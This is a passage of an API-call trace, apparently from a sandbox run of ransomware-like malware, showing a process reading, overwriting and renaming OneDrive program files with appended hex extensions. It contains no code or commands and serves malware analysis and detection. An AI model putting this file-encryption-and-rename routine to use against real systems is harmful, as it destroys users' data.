lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat.9540D5BD726EED8BD33A6F04EECBF9DE248D9584AC335BA23D05AA8F35424821") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat.9540D5BD726EED8BD33A6F04EECBF9DE248D9584AC335BA23D05AA8F35424821" [0111.533] GetProcessHeap () returned 0x600000 [0111.533] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x178) returned 0x63af68 [0111.533] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x63af68, Length=0x178, FileInformationClass=0xa) returned 0x0 [0111.548] CloseHandle (hObject=0x330) returned 1 [0111.550] GetProcessHeap () returned 0x600000 [0111.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.551] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.619] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.619] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.620] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.621] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.621] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0111.621] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll", lpString2=".A431AE2EA457EBB9CDFD27AF385CE2FBB0A3706FFD280E6479BB6ED6A2555577" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll.A431AE2EA457EBB9CDFD27AF385CE2FBB0A3706FFD280E6479BB6ED6A2555577") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll.A431AE2EA457EBB9CDFD27AF385CE2FBB0A3706FFD280E6479BB6ED6A2555577" [0111.622] GetProcessHeap () returned 0x600000 [0111.622] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15e) returned 0x6f4048 [0111.622] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x6f4048, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0111.622] CloseHandle (hObject=0x330) returned 1 [0111.625] GetProcessHeap () returned 0x600000 [0111.625] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.626] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.628] ReadFile (in: hFile=0x334, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.628] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.629] WriteFile (in: hFile=0x334, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.629] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.630] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x29fff70) returned 0x0 [0111.630] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll", lpString2=".D0A9E4BF07E5C2FA4965BF89FDF245EE4B58CA9DB052CC8AAB0E70C2F5E2012F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll.D0A9E4BF07E5C2FA4965BF89FDF245EE4B58CA9DB052CC8AAB0E70C2F5E2012F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll.D0A9E4BF07E5C2FA4965BF89FDF245EE4B58CA9DB052CC8AAB0E70C2F5E2012F" [0111.630] GetProcessHeap () returned 0x600000 [0111.630] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x176) returned 0x63a4b0 [0111.630] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x29fff60, FileInformation=0x63a4b0, Length=0x176, FileInformationClass=0xa) returned 0x0 [0111.631] CloseHandle (hObject=0x334) returned 1 [0111.646] GetProcessHeap () returned 0x600000 [0111.647] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.648] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.749] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.751] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.753] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0111.753] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png", lpString2=".7BB716A615A0DAF6F7D73A6BA6794FA8BA76523F49B97CB2BC02C63768E45310" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png.7BB716A615A0DAF6F7D73A6BA6794FA8BA76523F49B97CB2BC02C63768E45310") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png.7BB716A615A0DAF6F7D73A6BA6794FA8BA76523F49B97CB2BC02C63768E45310" [0111.753] GetProcessHeap () returned 0x600000 [0111.753] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x6f41b0 [0111.753] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x29fff60, FileInformation=0x6f41b0, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0111.754] CloseHandle (hObject=0x334) returned 1 [0111.756] GetProcessHeap () returned 0x600000 [0111.756] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.757] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.760] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.760] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.761] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0111.762] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif", lpString2=".85F618B9046AA721673C61C07952CD7AB74912C0EACA1B5D46963F20292CA20D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif.85F618B9046AA721673C61C07952CD7AB74912C0EACA1B5D46963F20292CA20D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif.85F618B9046AA721673C61C07952CD7AB74912C0EACA1B5D46963F20292CA20D" [0111.762] GetProcessHeap () returned 0x600000 [0111.762] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x6f4328 [0111.762] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x6f4328, Length=0x170, FileInformationClass=0xa) returned 0x0 [0111.763] CloseHandle (hObject=0x330) returned 1 [0111.775] GetProcessHeap () returned 0x600000 [0111.775] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.777] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.783] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.783] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.789] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.789] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.794] WriteFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0111.795] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.797] WriteFile (in: hFile=0x318, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0111.798] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.804] ReadFile (in: hFile=0x310, lpBuffer=0x680470, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0111.804] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.843] WriteFile (in: hFile=0x310, lpBuffer=0x680470, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 0x0 [0111.844] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.978] ReadFile (in: hFile=0x328, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.978] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.020] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x688540, ReturnLength=0x29fff70) returned 0x0 [0112.021] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll", lpString2=".526E987147DBEB4F45421841665274C579E0C01AC831A3EDE0A73F581504261B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll.526E987147DBEB4F45421841665274C579E0C01AC831A3EDE0A73F581504261B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll.526E987147DBEB4F45421841665274C579E0C01AC831A3EDE0A73F581504261B" [0112.021] GetProcessHeap () returned 0x600000 [0112.021] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x172) returned 0x63ba20 [0112.021] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x63ba20, Length=0x172, FileInformationClass=0xa) returned 0x0 [0112.070] CloseHandle (hObject=0x330) returned 1 [0112.070] GetProcessHeap () returned 0x600000 [0112.070] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.072] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.349] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0112.349] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.453] ReadFile (in: hFile=0x330, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0112.453] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.454] WriteFile (in: hFile=0x328, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0112.456] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.831] ReadFile (in: hFile=0x310, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0112.831] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.849] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.849] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.863] ReadFile (in: hFile=0x318, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0112.863] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.873] WriteFile (in: hFile=0x318, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0112.873] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.874] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0112.875] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png", lpString2=".FE1A8DCDCEB5B4C17DCCEFEE1513617A8F45EB365E4F9E30380D1F3CE601CD02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png.FE1A8DCDCEB5B4C17DCCEFEE1513617A8F45EB365E4F9E30380D1F3CE601CD02") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png.FE1A8DCDCEB5B4C17DCCEFEE1513617A8F45EB365E4F9E30380D1F3CE601CD02" [0112.875] GetProcessHeap () returned 0x600000 [0112.875] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315ba88 [0112.875] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x29fff60, FileInformation=0x315ba88, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.893] CloseHandle (hObject=0x318) returned 1 [0112.893] GetProcessHeap () returned 0x600000 [0112.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.895] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.908] ReadFile (in: hFile=0x318, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0112.908] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.914] WriteFile (in: hFile=0x318, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0112.937] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.943] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0112.944] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll", lpString2=".B5BEAC9EE82F80296581AF85B7B189F0866EFFC2699516ED8CE65628741B174D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll.B5BEAC9EE82F80296581AF85B7B189F0866EFFC2699516ED8CE65628741B174D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll.B5BEAC9EE82F80296581AF85B7B189F0866EFFC2699516ED8CE65628741B174D" [0112.944] GetProcessHeap () returned 0x600000 [0112.944] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x172) returned 0x63a328 [0112.944] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x29fff60, FileInformation=0x63a328, Length=0x172, FileInformationClass=0xa) returned 0x0 [0112.947] CloseHandle (hObject=0x318) returned 1 [0112.947] GetProcessHeap () returned 0x600000 [0112.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.948] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.952] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x29fff70) returned 0x0 [0112.952] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat", lpString2=".9EFDDA3B796D5BC24FB1E20D1B8AC0D5EB8E87B6527FE1E7E26311D8C9282A4F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat.9EFDDA3B796D5BC24FB1E20D1B8AC0D5EB8E87B6527FE1E7E26311D8C9282A4F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat.9EFDDA3B796D5BC24FB1E20D1B8AC0D5EB8E87B6527FE1E7E26311D8C9282A4F" [0112.952] GetProcessHeap () returned 0x600000 [0112.952] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x63a7c0 [0112.952] NtSetInformationFile (FileHandle=0x310, 